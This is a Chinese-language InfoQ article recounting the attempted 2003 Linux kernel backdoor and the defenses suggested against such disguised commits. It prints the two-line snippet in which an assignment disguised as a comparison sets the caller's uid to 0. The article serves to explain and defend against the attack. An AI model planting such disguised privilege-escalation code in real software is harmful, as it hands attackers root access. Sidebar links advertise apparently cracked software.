QCon北京「鸿蒙专场」火热来袭!即刻报名,与创新同行~ 了解详情
写点什么

回顾 Linux 内核后门

  • 2013-12-29
  • 本文字数:1138 字

    阅读完需:约 4 分钟

由于最近大众对美国国家安全局(NAS)的关注,人们的注意力转移到后门程序上。对于不熟悉该术语的人们,后门是一种有意在操作系统或软件中植入的漏洞,允许未授权的用户访问系统。在 2003 年曾经有人试图向 Linux 内核植入后门,虽然被发现了,但是这表明不论看上去多普通的变更都会引入漏洞,以及源码控制管理的重要性。

Corbet 在 LVN.Net 的文章中首次提到以下这段代码,它把自己伪装成类似 wait4 函数的参数校验。

复制代码
if((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

正常情况下没有任何影响,但是如果调用程序故意传入非法值,if 表达式的第二部分就会执行。该部分会将程序的用户 ID(current->uid)设为 0, 在 Linux 中就是 root 用户。

一眼看上去这就像是一个简单的代码错误,开发人员经常疏忽将’==‘写成’=’。虽然你认为函数 wait4 不应该与用户 ID 有任何关系,但是很明显这是故意为为之。

Corbet 描述了该后门是如何被发现的

CVS 库中的每个变更都会包含反向链接信息,表明与 BitKeeper 中的变更相同。有问题的变更缺少这样的信息,所以很快就能辨认出来。 试图通过这种方式进行变更是很可疑的,至少可以这么说,所以我们非常关注变更请求到底是什么。

攻击者曾经再次向 BitKeeper 库的 CVS 克隆库中植入后门。他继续说道

CVS 代码库是从 BitKeeper 生成的,但是补丁程序进入 BitKeeper 代码库并不经过它。所以有问题的代码只会影响基于 CVS 代码库工作的用户。发行商使用的内核不是来自该库,这次事故也说明,问题代码能够驻留很长一段时间。

大家想象一下,如果有人向代码库发起这样的攻击,增加几行看上去很好的代码,实际上植入了一个后门,而代码库没有 Linux 内核团队的控制和严格检查,你如何保护自己不受攻击。

一种方式是在应用程序中创建自己的“内核”,只有这段代码可以改变用户的角色和权限。其他的代码只是获取到用户权限的只读视图,这样他们就不能轻易得获取 root 权限。

在这样的模型中,"current->uid=0"这样的代码不会编译。如果任何人想实施攻击,或是直接修改应用程序的安全模块,但是我们会密切关注这样的修改,或是使用反射的伎俩,但是反射代码肯定比简单的赋值操作更容易被察觉到。

如果语言层面支持,一种更好的方式是使用户权限完全不可变。这种方式能够更大程度限制攻击发生的地方,只能是创建权限的地方。

这些措施应该配合对源码控制服务器的限制进行实施。一是限制尽可能少的人向主分支中提交代码,而不是过于开放;二是安全敏感代码默认应该完全锁定,只能根据问题具体情况授予编辑权限,实施的具体方法依赖此人是否使用分布式或集中式的源码控制以及具体的产品。

如果没有在变更代码成为产品之前进行审计,最终这些技术都会失效,这些措施只能减少审计疏漏问题发生的可能性。

2013-12-29 22:134561
用户头像

发布了 28 篇内容, 共 10.9 次阅读, 收获喜欢 0 次。

关注

评论

发布
暂无评论
发现更多内容

Arthas命令太难记了?安利一个IDEA插件!

江南一点雨

苹果电脑批量重命名工具:A Better Finder Rename 12

Rose

云栖实录 | GenAI 时代 AI Infra 工程技术趋势与平台演进

阿里云大数据AI技术

人工智能 阿里云 云栖大会 PAI AI Infra

Royal TSX v6.0.2激活版 Mac强大的远程管理

Rose

火山引擎成功举办首届AI创造者大赛,打造智能体推动汽车行业模型能力应用

新消费日报

豆包大模型发布视频生成模型,语义理解精准、画质高保真

新消费日报

云数据库RDS MySQL性能测试与对比@2024年09月

NineData

性能测试 云数据库 对比 RDS MySQL

sublime text :轻量级的文本编辑器

Rose

中小企业高效协作“神器”!华为云会议Flexus版828超值优惠

轶天下事

利用反射扫描枚举生成数据字典数据

六哥是全栈

spring 反射 枚举 #java 数据字典

出发深维智信,拿offer去

王中阳Go

面试 面经 golang 面试

首批通过!华为云CodeArts Snap智能开发助手通过可信AI智能编码工具评估,获当前最高等级

平平无奇爱好科技

英特尔发布至强6性能核处理器,以更强性能助力算力升级

E科讯

AI赋能制造未来,英特尔工博会展示创新成果

E科讯

Axure RP10汉化版激活秘钥 交互式原型设计

Rose

macos big sur 软件icons图标大全(新增至2719枚大苏尔风格图标)

Rose

动态精选|华为云全域Serverless 8月更新盘点

平平无奇爱好科技

分布式缓存服务Redis®版9月企业版、灵活的购买方式全新上市

平平无奇爱好科技

睿呈时代基于华为云Astro发布“数字孪生平台+政企智慧应用”全方案

平平无奇爱好科技

Minitab Express Mac数据分析统计软件 v1.5.0激活版

Rose

WiFi Explorer for mac:扫描查找无线网络并进行故障排除

Rose

mac专用图片管理工具 PowerPhotos

Rose

犀牛Rhinoceros 7:渲染功能大升级,打造逼真视觉体验!

Rose

怎样免费使用API将文字转换为拼音

幂简集成

API

AI加速前行,英特尔PT Expo演绎网络智能化新发展

E科讯

SimpleMind Pro:一键理清思绪,高效思维导图工具

Rose

回顾Linux内核后门_安全_Jonathan Allen_InfoQ精选文章